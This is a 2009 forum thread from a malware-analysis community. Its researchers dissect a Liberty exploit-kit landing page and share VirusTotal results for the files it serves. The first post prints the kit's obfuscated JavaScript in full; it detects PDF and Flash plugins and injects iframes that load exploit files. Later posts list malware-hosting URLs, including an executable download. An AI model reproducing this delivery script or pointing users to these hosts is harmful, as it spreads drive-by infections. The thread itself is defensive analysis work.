Malware Domain List

Malware Related => Malware Analysis => Topic started by: cleanmx on August 27, 2009, 06:44:47 pm

Title: pdf swf exploit in iframe
Post by: cleanmx on August 27, 2009, 06:44:47 pm
no luck to decode this with malzilla...

Code: [Select]
http://franchjump.ru/lib/index.php
leads to:
Code: [Select]
<html><head></head><body><script>function qVkMn73vX(qVkMn73vX){return true;}var x0RUJqGCTF = new Array("PDF.PdfCtrl",
"AcroPDF.PDF", "ShockwaveFlash.ShockwaveFlash", "Adobe Acrobat", "Adobe PDF", "Flash");this.lpZBwtxYaW=13553;function
b7vOGuKPk(rhodih6xR){var lSQBVtKKX=false;var njJadnyF2 = document.createElement("iframe");var
vGTSfY3ftC='vGTSfY3ftC';njJadnyF2.setAttribute("src", rhodih6xR);var
ra2KsGcQ3="ra2KsGcQ3";njJadnyF2.setAttribute("width", 200);var fTdFvA65k=1511;njJadnyF2.setAttribute("height",
200);this.cE7Uzbow='cE7Uzbow';document.body.appendChild(njJadnyF2);this.f1ZyDcfNJ=16427;}this.lFGmhMmt9=false;if(navigator.userAgent.indexOf("MSIE")
!= -1){this.lFGmhMmt9=false;for(mMb5G2BC = 0; mMb5G2BC < 3; mMb5G2BC ++){try{mzF1gvC6I = new
ActiveXObject(x0RUJqGCTF[mMb5G2BC]);function wEmSDxNQh(){}if(mzF1gvC6I){function iw2iiIFYF(iw2iiIFYF){return
true;}switch(mMb5G2BC){case 0:case 1:b7vOGuKPk("belowTendSome.pdf");break;case 2:b7vOGuKPk("evilSOr.swf");break;}var
wLGLEXnXZ=27351;}else{var sEZtIAB6M="sEZtIAB6M";}}catch(e){ function sHpNQCBS6(sHpNQCBS6){return sHpNQCBS6;}
}}}else{this.tHPi7ocW4="tHPi7ocW4";for(w594UW3fa = 0; w594UW3fa <= navigator.plugins.length; w594UW3fa++){var a1VPNeZNR
= navigator.plugins[w594UW3fa].name;if((a1VPNeZNR.indexOf(x0RUJqGCTF[3]) != -1 || a1VPNeZNR.indexOf(x0RUJqGCTF[4]) !=
-1)) b7vOGuKPk("belowTendSome.pdf");if( a1VPNeZNR.indexOf(x0RUJqGCTF[5]) != -1 ) b7vOGuKPk("evilSOr.swf");}function
wJwuFMJm(wJwuFMJm){return true;}}this.rsmpJInjI='rsmpJInjI';var hhNE48RIR="hhNE48RIR";var
jPyi2a1aR="jPyi2a1aR";</script></body></html>
Title: Re: pdf swf exploit in iframe
Post by: MysteryFCM on August 27, 2009, 07:01:02 pm
Full source code for it attached (above is only partial code)
Title: Re: pdf swf exploit in iframe
Post by: RS-232 on August 27, 2009, 11:42:32 pm
hxxp://franchjump.ru/lib/update.php?id=2
Result: 10/41 (24.4%)
http://www.virustotal.com/analisis/d35dbb8eb7cc043ccb7f92aabe8886785ad35adb54cc8c139bdee00ab8d89c50-1251416118

hxxp://franchjump.ru/lib/webThere.png
Result: 5/41 (12.2%)
http://www.virustotal.com/analisis/669db4a1fa13693720475125509f752fddc1c347eed7959dbbb74de6d4bb8785-1251416942

hxxp://franchjump.ru/lib/belowTendSome.pdf
Result: 6/41 (14.64%)
http://www.virustotal.com/analisis/5434abe05a5ae1114754176e7297839e96d2b9ebe8082e28c31a3d2944e1cbe5-1251415971

hxxp://franchjump.ru/lib/evilSOr.swf
Result: 2/41 (4.88%)
http://www.virustotal.com/analisis/640e72c3753dd90322fbb26728d44011e0041824ede84419474f19b5227b38b9-1251390004

This crap is UCS2 with a twist...now if only i was slightly better in regexp,but anyway...
a bit of google-fu revealed how to go about de-obfuscating this lameness:  :)
http://www.web2secure.com/2009/08/complex-obfuscated-js-code-in-pdf.html

Semi-decoded js crap in attachment below - nice ip address by the way,full of crappy domains...
http://www.bfk.de/bfk_dnslogger.html?query=211.95.78.98#result
Title: Re: pdf swf exploit in iframe
Post by: RS-232 on August 28, 2009, 11:51:57 am
From the same ip (and not already spotted in the list,as most of the aformentioned domains are)...

hxxp://uploadfilefree.ru/cc.exe
Result: 2/41 (4.88%):
http://www.virustotal.com/analisis/42fdb8be709abed7a12a8c76e9e4ff5b85a54c659862c59a25b2f09baebef0df-1251460092
Title: Re: pdf swf exploit in iframe
Post by: WIEx on August 28, 2009, 12:13:37 pm
this is a Liberty Exploit
Title: Re: pdf swf exploit in iframe
Post by: RS-232 on August 28, 2009, 12:20:23 pm
Quote
this is a Liberty Exploit
...nothing really special in it in my personal view (at least when compared to the rest of exploit packs),
except maybe from the Exploit.JS.DirektShow in the 'webThere.png' mentioned above...